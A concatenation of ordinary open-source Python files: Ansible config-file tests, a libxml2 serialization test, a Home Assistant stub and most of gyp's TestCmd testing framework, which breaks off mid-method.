assert warnings == set()
# ANSIBLE_CONFIG not specified
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# All config files are present except in cwd
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_file, alt_cfg_file)]],
indirect=['setup_existing_files'])
def test_no_cwd_cfg_no_warning_on_writable(self, setup_env, setup_existing_files, monkeypatch):
"""If the cwd is writable but there is no config file there, move on with no warning"""
real_stat = os.stat
def _os_stat(path):
if path == working_dir:
from posix import stat_result
stat_info = list(real_stat(path))
stat_info[stat.ST_MODE] |= stat.S_IWOTH
return stat_result(stat_info)
else:
return real_stat(path)
monkeypatch.setattr('os.stat', _os_stat)
warnings = set()
assert find_ini_config_file(warnings) == cfg_in_homedir
assert len(warnings) == 0
# ANSIBLE_CONFIG not specified
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# All config files are present
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_in_cwd, cfg_file, alt_cfg_file)]],
indirect=['setup_existing_files'])
def test_cwd_warning_on_writable(self, setup_env, setup_existing_files, monkeypatch):
"""If the cwd is writable, warn and skip it """
real_stat = os.stat
def _os_stat(path):
if path == working_dir:
from posix import stat_result
stat_info = list(real_stat(path))
stat_info[stat.ST_MODE] |= stat.S_IWOTH
return stat_result(stat_info)
else:
return real_stat(path)
monkeypatch.setattr('os.stat', _os_stat)
warnings = set()
assert find_ini_config_file(warnings) == cfg_in_homedir
assert len(warnings) == 1
warning = warnings.pop()
assert u'Ansible is being run in a world writable directory' in warning
assert u'ignoring it as an ansible.cfg source' in warning
    # ANSIBLE_CONFIG is specified
@pytest.mark.parametrize('setup_env, expected', (([alt_cfg_file], alt_cfg_file), ([cfg_in_cwd], cfg_in_cwd)), indirect=['setup_env'])
# All config files are present
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_in_cwd, cfg_file, alt_cfg_file)]],
indirect=['setup_existing_files'])
def test_no_warning_on_writable_if_env_used(self, setup_env, setup_existing_files, monkeypatch, expected):
"""If the cwd is writable but ANSIBLE_CONFIG was used, no warning should be issued"""
real_stat = os.stat
def _os_stat(path):
if path == working_dir:
from posix import stat_result
stat_info = list(real_stat(path))
stat_info[stat.ST_MODE] |= stat.S_IWOTH
return stat_result(stat_info)
else:
return real_stat(path)
monkeypatch.setattr('os.stat', _os_stat)
warnings = set()
assert find_ini_config_file(warnings) == expected
assert warnings == set()
# ANSIBLE_CONFIG not specified
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# All config files are present
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_in_cwd, cfg_file, alt_cfg_file)]],
indirect=['setup_existing_files'])
def test_cwd_warning_on_writable_no_warning_set(self, setup_env, setup_existing_files, monkeypatch):
"""Smoketest that the function succeeds even though no warning set was passed in"""
real_stat = os.stat
def _os_stat(path):
if path == working_dir:
from posix import stat_result
stat_info = list(real_stat(path))
stat_info[stat.ST_MODE] |= stat.S_IWOTH
return stat_result(stat_info)
else:
return real_stat(path)
monkeypatch.setattr('os.stat', _os_stat)
assert find_ini_config_file() == cfg_in_homedir
|
racker/omnibus | refs/heads/master | source/libxml2-2.7.7/python/tests/cutnpaste.py | 87 | #!/usr/bin/python -u
import sys
import libxml2
# Memory debug specific
libxml2.debugMemory(1)
#
# Testing XML document serialization
#
source = libxml2.parseDoc("""<?xml version="1.0"?>
<root xmlns:foo="http://example.org/foo"
xmlns:bar="http://example.org/bar">
<include xmlns="http://example.org/include">
<fragment><foo:elem bar="tricky"/></fragment>
</include>
</root>
""")
target = libxml2.parseDoc("""<?xml version="1.0"?>
<root xmlns:foobar="http://example.org/bar"/>""")
fragment = source.xpathEval("//*[name()='fragment']")[0]
dest = target.getRootElement()
# do a cut and paste operation
fragment.unlinkNode()
dest.addChild(fragment)
# do the namespace fixup
dest.reconciliateNs(target)
# The source tree can be freed at that point
source.freeDoc()
# check the resulting tree
str = dest.serialize()
if str != """<root xmlns:foobar="http://example.org/bar" xmlns:default="http://example.org/include" xmlns:foo="http://example.org/foo"><default:fragment><foo:elem bar="tricky"/></default:fragment></root>""":
print "reconciliateNs() failed"
sys.exit(1)
target.freeDoc()
# Memory debug specific
libxml2.cleanupParser()
if libxml2.debugMemory(1) == 0:
print "OK"
else:
print "Memory leak %d bytes" % (libxml2.debugMemory(1))
libxml2.dumpMemory()
|
pschmitt/home-assistant | refs/heads/dev | homeassistant/components/russound_rio/__init__.py | 36 | """The russound_rio component."""
|
brson/gyp | refs/heads/master | test/lib/TestCmd.py | 330 | """
TestCmd.py: a testing framework for commands and scripts.
The TestCmd module provides a framework for portable automated testing
of executable commands and scripts (in any language, not just Python),
especially commands and scripts that require file system interaction.
In addition to running tests and evaluating conditions, the TestCmd
module manages and cleans up one or more temporary workspace
directories, and provides methods for creating files and directories in
those workspace directories from in-line data, here-documents), allowing
tests to be completely self-contained.
A TestCmd environment object is created via the usual invocation:
import TestCmd
test = TestCmd.TestCmd()
There are a bunch of keyword arguments available at instantiation:
test = TestCmd.TestCmd(description = 'string',
program = 'program_or_script_to_test',
interpreter = 'script_interpreter',
workdir = 'prefix',
subdir = 'subdir',
verbose = Boolean,
match = default_match_function,
diff = default_diff_function,
combine = Boolean)
There are a bunch of methods that let you do different things:
test.verbose_set(1)
test.description_set('string')
test.program_set('program_or_script_to_test')
test.interpreter_set('script_interpreter')
test.interpreter_set(['script_interpreter', 'arg'])
test.workdir_set('prefix')
test.workdir_set('')
test.workpath('file')
test.workpath('subdir', 'file')
test.subdir('subdir', ...)
test.rmdir('subdir', ...)
test.write('file', "contents\n")
test.write(['subdir', 'file'], "contents\n")
test.read('file')
test.read(['subdir', 'file'])
test.read('file', mode)
test.read(['subdir', 'file'], mode)
test.writable('dir', 1)
test.writable('dir', None)
test.preserve(condition, ...)
test.cleanup(condition)
test.command_args(program = 'program_or_script_to_run',
interpreter = 'script_interpreter',
arguments = 'arguments to pass to program')
test.run(program = 'program_or_script_to_run',
interpreter = 'script_interpreter',
arguments = 'arguments to pass to program',
chdir = 'directory_to_chdir_to',
             stdin = 'input to feed to the program\n',
             universal_newlines = True)
p = test.start(program = 'program_or_script_to_run',
interpreter = 'script_interpreter',
arguments = 'arguments to pass to program',
universal_newlines = None)
test.finish(self, p)
test.pass_test()
test.pass_test(condition)
test.pass_test(condition, function)
test.fail_test()
test.fail_test(condition)
test.fail_test(condition, function)
test.fail_test(condition, function, skip)
test.no_result()
test.no_result(condition)
test.no_result(condition, function)
test.no_result(condition, function, skip)
test.stdout()
test.stdout(run)
test.stderr()
test.stderr(run)
test.symlink(target, link)
test.banner(string)
test.banner(string, width)
test.diff(actual, expected)
test.match(actual, expected)
test.match_exact("actual 1\nactual 2\n", "expected 1\nexpected 2\n")
test.match_exact(["actual 1\n", "actual 2\n"],
["expected 1\n", "expected 2\n"])
test.match_re("actual 1\nactual 2\n", regex_string)
test.match_re(["actual 1\n", "actual 2\n"], list_of_regexes)
test.match_re_dotall("actual 1\nactual 2\n", regex_string)
test.match_re_dotall(["actual 1\n", "actual 2\n"], list_of_regexes)
test.tempdir()
test.tempdir('temporary-directory')
test.sleep()
test.sleep(seconds)
test.where_is('foo')
test.where_is('foo', 'PATH1:PATH2')
test.where_is('foo', 'PATH1;PATH2', '.suffix3;.suffix4')
test.unlink('file')
test.unlink('subdir', 'file')
The TestCmd module provides pass_test(), fail_test(), and no_result()
unbound functions that report test results for use with the Aegis change
management system. These methods terminate the test immediately,
reporting PASSED, FAILED, or NO RESULT respectively, and exiting with
status 0 (success), 1 or 2 respectively. This allows for a distinction
between an actual failed test and a test that could not be properly
evaluated because of an external condition (such as a full file system
or incorrect permissions).
import TestCmd
TestCmd.pass_test()
TestCmd.pass_test(condition)
TestCmd.pass_test(condition, function)
TestCmd.fail_test()
TestCmd.fail_test(condition)
TestCmd.fail_test(condition, function)
TestCmd.fail_test(condition, function, skip)
TestCmd.no_result()
TestCmd.no_result(condition)
TestCmd.no_result(condition, function)
TestCmd.no_result(condition, function, skip)
The TestCmd module also provides unbound functions that handle matching
in the same way as the match_*() methods described above.
import TestCmd
test = TestCmd.TestCmd(match = TestCmd.match_exact)
test = TestCmd.TestCmd(match = TestCmd.match_re)
test = TestCmd.TestCmd(match = TestCmd.match_re_dotall)
The TestCmd module provides unbound functions that can be used for the
"diff" argument to TestCmd.TestCmd instantiation:
import TestCmd
test = TestCmd.TestCmd(match = TestCmd.match_re,
diff = TestCmd.diff_re)
test = TestCmd.TestCmd(diff = TestCmd.simple_diff)
The "diff" argument can also be used with standard difflib functions:
import difflib
test = TestCmd.TestCmd(diff = difflib.context_diff)
test = TestCmd.TestCmd(diff = difflib.unified_diff)
Lastly, the where_is() method also exists in an unbound function
version.
import TestCmd
TestCmd.where_is('foo')
TestCmd.where_is('foo', 'PATH1:PATH2')
TestCmd.where_is('foo', 'PATH1;PATH2', '.suffix3;.suffix4')
"""
# Copyright 2000-2010 Steven Knight
# This module is free software, and you may redistribute it and/or modify
# it under the same terms as Python itself, so long as this copyright message
# and disclaimer are retained in their original form.
#
# IN NO EVENT SHALL THE AUTHOR BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT,
# SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF
# THIS CODE, EVEN IF THE AUTHOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
#
# THE AUTHOR SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE. THE CODE PROVIDED HEREUNDER IS ON AN "AS IS" BASIS,
# AND THERE IS NO OBLIGATION WHATSOEVER TO PROVIDE MAINTENANCE,
# SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
__author__ = "Steven Knight <knight at baldmt dot com>"
__revision__ = "TestCmd.py 0.37.D001 2010/01/11 16:55:50 knight"
__version__ = "0.37"
import errno
import os
import os.path
import re
import shutil
import stat
import string
import sys
import tempfile
import time
import traceback
import types
import UserList
__all__ = [
'diff_re',
'fail_test',
'no_result',
'pass_test',
'match_exact',
'match_re',
'match_re_dotall',
'python_executable',
'TestCmd'
]
try:
import difflib
except ImportError:
__all__.append('simple_diff')
def is_List(e):
return type(e) is types.ListType \
or isinstance(e, UserList.UserList)
try:
from UserString import UserString
except ImportError:
class UserString:
pass
if hasattr(types, 'UnicodeType'):
def is_String(e):
return type(e) is types.StringType \
or type(e) is types.UnicodeType \
or isinstance(e, UserString)
else:
def is_String(e):
return type(e) is types.StringType or isinstance(e, UserString)
tempfile.template = 'testcmd.'
if os.name in ('posix', 'nt'):
tempfile.template = 'testcmd.' + str(os.getpid()) + '.'
else:
tempfile.template = 'testcmd.'
re_space = re.compile('\s')
_Cleanup = []
_chain_to_exitfunc = None
def _clean():
global _Cleanup
cleanlist = filter(None, _Cleanup)
del _Cleanup[:]
cleanlist.reverse()
for test in cleanlist:
test.cleanup()
if _chain_to_exitfunc:
_chain_to_exitfunc()
try:
import atexit
except ImportError:
# TODO(1.5): atexit requires python 2.0, so chain sys.exitfunc
try:
_chain_to_exitfunc = sys.exitfunc
except AttributeError:
pass
sys.exitfunc = _clean
else:
atexit.register(_clean)
try:
zip
except NameError:
def zip(*lists):
result = []
for i in xrange(min(map(len, lists))):
result.append(tuple(map(lambda l, i=i: l[i], lists)))
return result
class Collector:
def __init__(self, top):
self.entries = [top]
def __call__(self, arg, dirname, names):
pathjoin = lambda n, d=dirname: os.path.join(d, n)
self.entries.extend(map(pathjoin, names))
def _caller(tblist, skip):
string = ""
arr = []
for file, line, name, text in tblist:
if file[-10:] == "TestCmd.py":
break
arr = [(file, line, name, text)] + arr
atfrom = "at"
for file, line, name, text in arr[skip:]:
if name in ("?", "<module>"):
name = ""
else:
name = " (" + name + ")"
string = string + ("%s line %d of %s%s\n" % (atfrom, line, file, name))
atfrom = "\tfrom"
return string
def fail_test(self = None, condition = 1, function = None, skip = 0):
"""Cause the test to fail.
By default, the fail_test() method reports that the test FAILED
and exits with a status of 1. If a condition argument is supplied,
the test fails only if the condition is true.
"""
if not condition:
return
if not function is None:
function()
of = ""
desc = ""
sep = " "
if not self is None:
if self.program:
of = " of " + self.program
sep = "\n\t"
if self.description:
desc = " [" + self.description + "]"
sep = "\n\t"
at = _caller(traceback.extract_stack(), skip)
sys.stderr.write("FAILED test" + of + desc + sep + at)
sys.exit(1)
def no_result(self = None, condition = 1, function = None, skip = 0):
"""Causes a test to exit with no valid result.
By default, the no_result() method reports NO RESULT for the test
and exits with a status of 2. If a condition argument is supplied,
the test fails only if the condition is true.
"""
if not condition:
return
if not function is None:
function()
of = ""
desc = ""
sep = " "
if not self is None:
if self.program:
of = " of " + self.program
sep = "\n\t"
if self.description:
desc = " [" + self.description + "]"
sep = "\n\t"
if os.environ.get('TESTCMD_DEBUG_SKIPS'):
at = _caller(traceback.extract_stack(), skip)
sys.stderr.write("NO RESULT for test" + of + desc + sep + at)
else:
sys.stderr.write("NO RESULT\n")
sys.exit(2)
def pass_test(self = None, condition = 1, function = None):
"""Causes a test to pass.
By default, the pass_test() method reports PASSED for the test
and exits with a status of 0. If a condition argument is supplied,
the test passes only if the condition is true.
"""
if not condition:
return
if not function is None:
function()
sys.stderr.write("PASSED\n")
sys.exit(0)
def match_exact(lines = None, matches = None):
"""
"""
if not is_List(lines):
lines = string.split(lines, "\n")
if not is_List(matches):
matches = string.split(matches, "\n")
if len(lines) != len(matches):
return
for i in range(len(lines)):
if lines[i] != matches[i]:
return
return 1
def match_re(lines = None, res = None):
"""
"""
if not is_List(lines):
lines = string.split(lines, "\n")
if not is_List(res):
res = string.split(res, "\n")
if len(lines) != len(res):
return
for i in range(len(lines)):
s = "^" + res[i] + "$"
try:
expr = re.compile(s)
except re.error, e:
msg = "Regular expression error in %s: %s"
raise re.error, msg % (repr(s), e[0])
if not expr.search(lines[i]):
return
return 1
def match_re_dotall(lines = None, res = None):
"""
"""
if not type(lines) is type(""):
lines = string.join(lines, "\n")
if not type(res) is type(""):
res = string.join(res, "\n")
s = "^" + res + "$"
try:
expr = re.compile(s, re.DOTALL)
except re.error, e:
msg = "Regular expression error in %s: %s"
raise re.error, msg % (repr(s), e[0])
if expr.match(lines):
return 1
try:
import difflib
except ImportError:
pass
else:
def simple_diff(a, b, fromfile='', tofile='',
fromfiledate='', tofiledate='', n=3, lineterm='\n'):
"""
A function with the same calling signature as difflib.context_diff
(diff -c) and difflib.unified_diff (diff -u) but which prints
        output like the simple, unadorned 'diff' command.
"""
sm = difflib.SequenceMatcher(None, a, b)
def comma(x1, x2):
return x1+1 == x2 and str(x2) or '%s,%s' % (x1+1, x2)
result = []
for op, a1, a2, b1, b2 in sm.get_opcodes():
if op == 'delete':
result.append("%sd%d" % (comma(a1, a2), b1))
result.extend(map(lambda l: '< ' + l, a[a1:a2]))
elif op == 'insert':
result.append("%da%s" % (a1, comma(b1, b2)))
result.extend(map(lambda l: '> ' + l, b[b1:b2]))
elif op == 'replace':
result.append("%sc%s" % (comma(a1, a2), comma(b1, b2)))
result.extend(map(lambda l: '< ' + l, a[a1:a2]))
result.append('---')
result.extend(map(lambda l: '> ' + l, b[b1:b2]))
return result
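    # Illustrative sketch (not executed here): for two small line lists the
    # function returns plain ed-style hunks, e.g.
    #
    #     simple_diff(['a\n', 'b\n', 'c\n'], ['a\n', 'x\n', 'c\n'])
    #     # -> ['2c2', '< b\n', '---', '> x\n']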
def diff_re(a, b, fromfile='', tofile='',
fromfiledate='', tofiledate='', n=3, lineterm='\n'):
"""
A simple "diff" of two sets of lines when the expected lines
are regular expressions. This is a really dumb thing that
just compares each line in turn, so it doesn't look for
chunks of matching lines and the like--but at least it lets
        you know exactly which line first didn't compare correctly.
"""
result = []
diff = len(a) - len(b)
if diff < 0:
a = a + ['']*(-diff)
elif diff > 0:
b = b + ['']*diff
i = 0
for aline, bline in zip(a, b):
s = "^" + aline + "$"
try:
expr = re.compile(s)
except re.error, e:
msg = "Regular expression error in %s: %s"
raise re.error, msg % (repr(s), e[0])
if not expr.search(bline):
result.append("%sc%s" % (i+1, i+1))
result.append('< ' + repr(a[i]))
result.append('---')
result.append('> ' + repr(b[i]))
i = i+1
return result
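# Illustrative sketch (not executed here): the expected lines are treated as
# regular expressions, so only genuinely non-matching lines produce hunks:
#
#     diff_re(['ab.*'], ['abcdef'])   # -> []          (the regex matches)
#     diff_re(['ab.*'], ['xyz'])      # -> a one-line '1c1' hunk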
if os.name == 'java':
python_executable = os.path.join(sys.prefix, 'jython')
else:
python_executable = sys.executable
if sys.platform == 'win32':
default_sleep_seconds = 2
def where_is(file, path=None, pathext=None):
if path is None:
path = os.environ['PATH']
if is_String(path):
path = string.split(path, os.pathsep)
if pathext is None:
pathext = os.environ['PATHEXT']
if is_String(pathext):
pathext = string.split(pathext, os.pathsep)
for ext in pathext:
if string.lower(ext) == string.lower(file[-len(ext):]):
pathext = ['']
break
for dir in path:
f = os.path.join(dir, file)
for ext in pathext:
fext = f + ext
if os.path.isfile(fext):
return fext
return None
else:
def where_is(file, path=None, pathext=None):
if path is None:
path = os.environ['PATH']
if is_String(path):
path = string.split(path, os.pathsep)
for dir in path:
f = os.path.join(dir, file)
if os.path.isfile(f):
try:
st = os.stat(f)
except OSError:
continue
if stat.S_IMODE(st[stat.ST_MODE]) & 0111:
return f
return None
default_sleep_seconds = 1
try:
import subprocess
except ImportError:
# The subprocess module doesn't exist in this version of Python,
# so we're going to cobble up something that looks just enough
# like its API for our purposes below.
import new
subprocess = new.module('subprocess')
subprocess.PIPE = 'PIPE'
subprocess.STDOUT = 'STDOUT'
subprocess.mswindows = (sys.platform == 'win32')
try:
import popen2
popen2.Popen3
except AttributeError:
class Popen3:
universal_newlines = 1
def __init__(self, command, **kw):
if sys.platform == 'win32' and command[0] == '"':
command = '"' + command + '"'
(stdin, stdout, stderr) = os.popen3(' ' + command)
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
def close_output(self):
self.stdout.close()
self.resultcode = self.stderr.close()
def wait(self):
resultcode = self.resultcode
if os.WIFEXITED(resultcode):
return os.WEXITSTATUS(resultcode)
elif os.WIFSIGNALED(resultcode):
return os.WTERMSIG(resultcode)
else:
return None
else:
try:
popen2.Popen4
except AttributeError:
# A cribbed Popen4 class, with some retrofitted code from
# the Python 1.5 Popen3 class methods to do certain things
# by hand.
class Popen4(popen2.Popen3):
childerr = None
def __init__(self, cmd, bufsize=-1):
p2cread, p2cwrite = os.pipe()
c2pread, c2pwrite = os.pipe()
self.pid = os.fork()
if self.pid == 0:
# Child
os.dup2(p2cread, 0)
os.dup2(c2pwrite, 1)
os.dup2(c2pwrite, 2)
for i in range(3, popen2.MAXFD):
try:
os.close(i)
except: pass
try:
os.execvp(cmd[0], cmd)
finally:
os._exit(1)
# Shouldn't come here, I guess
os._exit(1)
os.close(p2cread)
self.tochild = os.fdopen(p2cwrite, 'w', bufsize)
os.close(c2pwrite)
self.fromchild = os.fdopen(c2pread, 'r', bufsize)
popen2._active.append(self)
popen2.Popen4 = Popen4
class Popen3(popen2.Popen3, popen2.Popen4):
universal_newlines = 1
def __init__(self, command, **kw):
if kw.get('stderr') == 'STDOUT':
apply(popen2.Popen4.__init__, (self, command, 1))
else:
apply(popen2.Popen3.__init__, (self, command, 1))
self.stdin = self.tochild
self.stdout = self.fromchild
self.stderr = self.childerr
def wait(self, *args, **kw):
resultcode = apply(popen2.Popen3.wait, (self,)+args, kw)
if os.WIFEXITED(resultcode):
return os.WEXITSTATUS(resultcode)
elif os.WIFSIGNALED(resultcode):
return os.WTERMSIG(resultcode)
else:
return None
subprocess.Popen = Popen3
# From Josiah Carlson,
# ASPN : Python Cookbook : Module to allow Asynchronous subprocess use on Windows and Posix platforms
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/440554
PIPE = subprocess.PIPE
if subprocess.mswindows:
from win32file import ReadFile, WriteFile
from win32pipe import PeekNamedPipe
import msvcrt
else:
import select
import fcntl
try: fcntl.F_GETFL
except AttributeError: fcntl.F_GETFL = 3
try: fcntl.F_SETFL
except AttributeError: fcntl.F_SETFL = 4
class Popen(subprocess.Popen):
def recv(self, maxsize=None):
return self._recv('stdout', maxsize)
def recv_err(self, maxsize=None):
return self._recv('stderr', maxsize)
def send_recv(self, input='', maxsize=None):
return self.send(input), self.recv(maxsize), self.recv_err(maxsize)
def get_conn_maxsize(self, which, maxsize):
if maxsize is None:
maxsize = 1024
elif maxsize < 1:
maxsize = 1
return getattr(self, which), maxsize
def _close(self, which):
getattr(self, which).close()
setattr(self, which, None)
if subprocess.mswindows:
def send(self, input):
if not self.stdin:
return None
try:
x = msvcrt.get_osfhandle(self.stdin.fileno())
(errCode, written) = WriteFile(x, input)
except ValueError:
return self._close('stdin')
except (subprocess.pywintypes.error, Exception), why:
if why[0] in (109, errno.ESHUTDOWN):
return self._close('stdin')
raise
return written
def _recv(self, which, maxsize):
conn, maxsize = self.get_conn_maxsize(which, maxsize)
if conn is None:
return None
try:
x = msvcrt.get_osfhandle(conn.fileno())
(read, nAvail, nMessage) = PeekNamedPipe(x, 0)
if maxsize < nAvail:
nAvail = maxsize
if nAvail > 0:
(errCode, read) = ReadFile(x, nAvail, None)
except ValueError:
return self._close(which)
except (subprocess.pywintypes.error, Exception), why:
if why[0] in (109, errno.ESHUTDOWN):
return self._close(which)
raise
#if self.universal_newlines:
# read = self._translate_newlines(read)
return read
else:
def send(self, input):
if not self.stdin:
return None
if not select.select([], [self.stdin], [], 0)[1]:
return 0
try:
written = os.write(self.stdin.fileno(), input)
except OSError, why:
if why[0] == errno.EPIPE: #broken pipe
return self._close('stdin')
raise
return written
def _recv(self, which, maxsize):
conn, maxsize = self.get_conn_maxsize(which, maxsize)
if conn is None:
return None
try:
flags = fcntl.fcntl(conn, fcntl.F_GETFL)
except TypeError:
flags = None
else:
if not conn.closed:
fcntl.fcntl(conn, fcntl.F_SETFL, flags| os.O_NONBLOCK)
try:
if not select.select([conn], [], [], 0)[0]:
return ''
r = conn.read(maxsize)
if not r:
return self._close(which)
#if self.universal_newlines:
# r = self._translate_newlines(r)
return r
finally:
if not conn.closed and not flags is None:
fcntl.fcntl(conn, fcntl.F_SETFL, flags)
disconnect_message = "Other end disconnected!"
def recv_some(p, t=.1, e=1, tr=5, stderr=0):
if tr < 1:
tr = 1
x = time.time()+t
y = []
r = ''
pr = p.recv
if stderr:
pr = p.recv_err
while time.time() < x or r:
r = pr()
if r is None:
if e:
raise Exception(disconnect_message)
else:
break
elif r:
y.append(r)
else:
time.sleep(max((x-time.time())/tr, 0))
return ''.join(y)
# TODO(3.0): rewrite to use memoryview()
def send_all(p, data):
while len(data):
sent = p.send(data)
if sent is None:
raise Exception(disconnect_message)
data = buffer(data, sent)
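# Rough usage sketch for the asynchronous helpers above (hypothetical,
# POSIX-flavoured; 'cat' is only an example command):
#
#     p = Popen(['cat'], stdin=PIPE, stdout=PIPE, stderr=PIPE)
#     send_all(p, 'hello\n')
#     p.stdin.close()
#     print recv_some(p)    # expected to read back 'hello\n'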
try:
object
except NameError:
class object:
pass
class TestCmd(object):
"""Class TestCmd
"""
def __init__(self, description = None,
program = None,
interpreter = None,
workdir = None,
subdir = None,
verbose = None,
match = None,
diff = None,
combine = 0,
universal_newlines = 1):
self._cwd = os.getcwd()
self.description_set(description)
self.program_set(program)
self.interpreter_set(interpreter)
if verbose is None:
try:
verbose = max( 0, int(os.environ.get('TESTCMD_VERBOSE', 0)) )
except ValueError:
verbose = 0
self.verbose_set(verbose)
self.combine = combine
self.universal_newlines = universal_newlines
if match is not None:
self.match_function = match
else:
self.match_function = match_re
if diff is not None:
self.diff_function = diff
else:
try:
difflib
except NameError:
pass
else:
self.diff_function = simple_diff
#self.diff_function = difflib.context_diff
#self.diff_function = difflib.unified_diff
self._dirlist = []
self._preserve = {'pass_test': 0, 'fail_test': 0, 'no_result': 0}
        if os.environ.has_key('PRESERVE') and os.environ['PRESERVE'] != '':
self._preserve['pass_test'] = os.environ['PRESERVE']
self._preserve['fail_test'] = os.environ['PRESERVE']
self._preserve['no_result'] = os.environ['PRESERVE']
else:
try:
self._preserve['pass_test'] = os.environ['PRESERVE_PASS']
except KeyError:
pass
try:
self._preserve['fail_test'] = os.environ['PRESERVE_FAIL']
except KeyError:
pass
try:
self._preserve['no_result'] = os.environ['PRESERVE_NO_RESULT']
except KeyError:
pass
self._stdout = []
self._stderr = []
self.status = None
self.condition = 'no_result'
self.workdir_set(workdir)
self.subdir(subdir)
def __del__(self):
self.cleanup()
def __repr__(self):
return "%x" % id(self)
banner_char = '='
banner_width = 80
def banner(self, s, width=None):
if width is None:
width = self.banner_width
return s + self.banner_char * (width - len(s))
if os.name == 'posix':
def escape(self, arg):
"escape shell special characters"
slash = '\\'
special = '"$'
arg = string.replace(arg, slash, slash+slash)
for c in special:
arg = string.replace(arg, c, slash+c)
if re_space.search(arg):
arg = '"' + arg + '"'
return arg
else:
# Windows does not allow special characters in file names
# anyway, so no need for an escape function, we will just quote
# the arg.
def escape(self, arg):
if re_space.search(arg):
arg = '"' + arg + '"'
return arg
def canonicalize(self, path):
if is_List(path):
path = apply(os.path.join, tuple(path))
if not os.path.isabs(path):
path = os.path.join(self.workdir, path)
return path
def chmod(self, path, mode):
"""Changes permissions on the specified file or directory
path name."""
path = self.canonicalize(path)
os.chmod(path, mode)
def cleanup(self, condition = None):
"""Removes any temporary working directories for the specified
TestCmd environment. If the environment variable PRESERVE was
set when the TestCmd environment was created, temporary working
directories are not removed. If any of the environment variables
PRESERVE_PASS, PRESERVE_FAIL, or PRESERVE_NO_RESULT were set
when the TestCmd environment was created, then temporary working
directories are not removed if the test passed, failed, or had
no result, respectively. Temporary working directories are also
preserved for conditions specified via the preserve method.
Typically, this method is not called directly, but is used when
the script exits to clean up temporary working directories as
appropriate for the exit status.
"""
if not self._dirlist:
return
os.chdir(self._cwd)
self.workdir = None
if condition is None:
condition = self.condition
if self._preserve[condition]:
for dir in self._dirlist:
print "Preserved directory", dir
else:
list = self._dirlist[:]
list.reverse()
for dir in list:
self.writable(dir, 1)
shutil.rmtree(dir, ignore_errors = 1)
self._dirlist = []
try:
global _Cleanup
_Cleanup.remove(self)
except (AttributeError, ValueError):
pass
def command_args(self, program = None,
interpreter = None,
arguments = None):
if program:
if type(program) == type('') and not os.path.isabs(program):
program = os.path.join(self._cwd, program)
else:
program = self.program
if not interpreter:
interpreter = self.interpreter
if not type(program) in [type([]), type(())]:
program = [program]
cmd = list(program)
if interpreter:
if not type(interpreter) in [type([]), type(())]:
interpreter = [interpreter]
cmd = list(interpreter) + cmd
if arguments:
if type(arguments) == type(''):
arguments = string.split(arguments)
cmd.extend(arguments)
return cmd
def description_set(self, description):
"""Set the description of the functionality being tested.
"""
self.description = description
try:
difflib
except NameError:
def diff(self, a, b, name, *args, **kw):
print self.banner('Expected %s' % name)
print a
print self.banner('Actual %s' % name)
print b
else:
def diff(self, a, b, name, *args, **kw):
print self.banner(name)
args = (a.splitlines(), b.splitlines()) + args
lines = apply(self.diff_function, args, kw)
for l in lines:
print l
def fail_test(self, condition = 1, function = None, skip = 0):
"""Cause the test to fail.
"""
if not condition:
return
self.condition = 'fail_test'
fail_test(self = self,
condition = condition,
function = function,
skip = skip)
def interpreter_set(self, interpreter):
"""Set the program to be used to interpret the program
under test as a script.
"""
self.interpreter = interpreter
def match(self, lines, matches):
"""Compare actual and expected file contents.
"""
return self.match_function(lines, matches)
def match_exact(self, lines, matches):
"""Compare actual and expected file contents.
"""
return match_exact(lines, matches)
def match_re(self, lines, res):
"""Compare actual and expected file contents.
"""
return match_re(lines, res)
def match_re_dotall(self, lines, res):
"""Compare actual and expected file contents.
"""
return match_re_dotall(lines, res)
def no_result(self, condition = 1, function = None, skip = 0):
"""Report that the test could not be run.
"""
if not condition:
return
self.condition = 'no_result'
no_result(self = self,
condition = condition,
function = function,
skip = skip)
def pass_test(self, condition = 1, function = None):
"""Cause the test to pass.
"""
if not condition:
return
self.condition = 'pass_test'
pass_test(self = self, condition = condition, function = function)
def preserve(self, *conditions):
"""Arrange for the temporary working directories for the
specified TestCmd environment to be preserved for one or more
conditions. If no conditions are specified, arranges for
the temporary working directories to be preserved for all
conditions.
"""
        if not conditions:
conditions = ('pass_test', 'fail_test', 'no_result')
for cond in conditions:
self._preserve[cond] = 1
def program_set(self, program):
"""Set the executable program or script to be tested.
"""
if program and not os.path.isabs(program):
program = os.path.join(self._cwd, program)
self.program = program
def read(self, file, mode = 'rb'):
"""Reads and returns the contents of the specified file name.
The file name may be a list, in which case the elements are
concatenated with the os.path.join() method. The file is
assumed to be under the temporary working directory unless it
is an absolute path name. The I/O mode for the file may
be specified; it must begin with an 'r'. The default is
'rb' (binary read).
"""
file = self.canonicalize(file)
if mode[0] != 'r':
raise ValueError, "mode must begin with 'r'"
with open(file, mode) as f:
result = f.read()
return result
def rmdir(self, dir):
"""Removes the specified dir name.
The dir name may be a list, in which case the elements are
concatenated with the os.path.join() method. The dir is
assumed to be under the temporary working directory unless it
is an absolute path name.
The dir must be empty.
"""
dir = self.canonicalize(dir)
os.rmdir(dir)
def start(self, program = None,
interpreter = None,
arguments = None,
universal_newlines = None,
**kw):
"""
Starts a program or script for the test environment.
The specified program will have the original directory
prepended unless it is enclosed in a [list].
"""
cmd = self.command_args(program, interpreter, arguments)
cmd_string = string.join(map(self.escape, cmd), ' ')
if self.verbose:
sys.stderr.write(cmd_string + "\n")
if universal_newlines is None:
